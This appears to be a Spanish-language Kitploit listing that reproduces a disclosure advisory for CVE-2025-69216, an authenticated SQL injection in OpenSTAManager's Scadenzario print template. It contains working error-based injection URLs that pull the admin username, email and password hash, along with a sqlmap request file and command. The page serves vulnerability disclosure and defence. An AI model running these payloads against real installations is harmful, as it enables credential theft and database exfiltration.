Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-69216 — Repositorio de prueba de concepto para CVE-2025-69216, una inyección SQL autenticada en la plantilla de impresión Scadenzario de OpenSTAManager, que permite la extracción de credenciales de administrador y contenidos de la base de datos mediante SQLi basada en errores y ciega. | Kitploit
Herramientas/GitHubGitHub/lukasz-rybak/cve-2025-69216
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónSeguridad de Bases de Datos
GitHublukasz-rybak/cve-2025-69216

CVE-2025-69216

Repositorio de prueba de concepto para CVE-2025-69216, una inyección SQL autenticada en la plantilla de impresión Scadenzario de OpenSTAManager, que permite la extracción de credenciales de administrador y contenidos de la base de datos mediante SQLi basada en errores y ciega.

Ver Repositorio
3hace 5 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2025-69216: OpenSTAManager tiene una inyección SQL en la plantilla de impresión Scadenzario

Descripción general

CampoDetalles
ID de CVECVE-2025-69216
GravedadALTA
Aviso de seguridadVer aviso
Descubierto porLukasz Rybak

Productos afectados

  • devcode-it/openstamanager (versiones: <= 2.9.8)

Clasificación CWE

  • CWE-89: Neutralización inadecuada de elementos especiales utilizados en un comando SQL ('Inyección SQL')

Detalles

Resumen

Una vulnerabilidad de inyección SQL autenticada en la plantilla de impresión Scadenzario (Calendario de pagos) de OpenSTAManager permite a cualquier usuario autenticado extraer datos confidenciales de la base de datos, incluidas credenciales de administrador, información de clientes y registros financieros. La vulnerabilidad permite el acceso de lectura completo a la base de datos mediante técnicas de inyección SQL basadas en errores.

Detalles

La vulnerabilidad existe en templates/scadenzario/init.php en la línea 46, donde el parámetro id_anagrafica se concatena directamente en una consulta SQL sin la sanitización adecuada:

Código vulnerable:

root@kitploit:~
if (get('id_anagrafica') && get('id_anagrafica') != 'null') {
    $module_query = str_replace('1=1', '1=1 AND `co_scadenziario`.`idanagrafica`="'.get('id_anagrafica').'"', $module_query);
    $id_anagrafica = get('id_anagrafica');
}

La función get() recupera la entrada del usuario de los parámetros GET/POST sin validación. El valor del parámetro se incrusta directamente en la cadena de la consulta SQL mediante concatenación de cadenas en lugar de utilizar la función de sanitización prepare() de la aplicación, lo que permite ataques de inyección SQL.

Causa raíz:

  • Falta de uso de la función prepare() para la sanitización de entradas
  • Concatenación directa de cadenas en la construcción de la consulta SQL
  • Sin validación de entradas ni verificación de tipos

Endpoint afectado:

root@kitploit:~
/pdfgen.php?ptype=scadenzario&id_anagrafica=[INJECTION_PAYLOAD]

Archivos afectados:

  • templates/scadenzario/init.php (línea 46) - Vulnerabilidad principal
  • templates/scadenzario/init.php (líneas 34, 40) - Patrón similar con parámetros de fecha
  • pdfgen.php - Punto de entrada para el renderizado de plantillas

PoC (Prueba de concepto)

Requisitos previos

  • Sesión autenticada válida (cualquier rol de usuario)

Pasos de explotación

1. Confirmar la vulnerabilidad: prueba básica de error de sintaxis:

root@kitploit:~
 http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20--%20

Error de sintaxis SQL mostrado en la respuesta de la aplicación

imagen

2. Extraer la versión de la base de datos: SQLi basado en errores:

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,VERSION(),0x7e))%20AND%20%221%22=%221

Resultado: ~8.3.0~ (versión de MySQL)

imagen

3. Extraer el nombre de la base de datos:

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,database(),0x7e))%20AND%20%221%22=%221

Resultado: ~openstamanager~

imagen

4. Extraer el nombre de usuario del administrador:

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20username%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221

Resultado: ~admin~ imagen


5. Extraer el correo electrónico del administrador:

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20email%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221

Resultado: Dirección de correo electrónico del administrador

imagen

6. Extraer el hash de la contraseña (parcial - límite de 31 caracteres de XPATH):

root@kitploit:~
http://localhost:8081/pdfgen.php?ptype=scadenzario&id_anagrafica=1%22%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20password%20FROM%20zz_users%20LIMIT%201),0x7e))%20AND%20%221%22=%221

Resultado: hash de contraseña bcrypt

imagen

7. Explotación automatizada con SQLMap:

Crea el archivo de solicitud sqli_osm.req:

root@kitploit:~
GET /pdfgen.php?ptype=scadenzario&id_anagrafica=1* HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=[SESSION_COOKIE]
User-Agent: Mozilla/5.0

Ejecuta SQLMap:

root@kitploit:~
sqlmap -r sqli_osm.req --level 3 --risk 3 --dbs

Tipos de inyección confirmados por SQLMap:

  • ✅ Inyección SQL ciega basada en booleanos
  • ✅ Inyección SQL basada en errores (MySQL >= 5.6 GTID_SUBSET)
  • ✅ Inyección SQL ciega basada en tiempo (SLEEP)
imagen

Impacto

Quiénes se ven afectados:

  • ✅ Todos los usuarios autenticados - Cualquier usuario con credenciales válidas puede explotar esta vulnerabilidad
  • ✅ Usuarios con privilegios bajos - Incluso los usuarios con permisos mínimos pueden acceder a datos de nivel administrador
  • ✅ Todas las instalaciones de OpenSTAManager - La vulnerabilidad existe en la última rama master

Atribución

Informado por Łukasz Rybak

Referencias

  • https://github.com/devcode-it/openstamanager/security/advisories/GHSA-q6g3-fv43-m2w6
  • https://nvd.nist.gov/vuln/detail/CVE-2025-69216
  • https://github.com/advisories/GHSA-q6g3-fv43-m2w6

Aviso legal

Este CVE fue divulgado de manera responsable siguiendo las prácticas de divulgación coordinada de vulnerabilidades. La información proporcionada aquí es solo con fines educativos y defensivos.

Descargar herramienta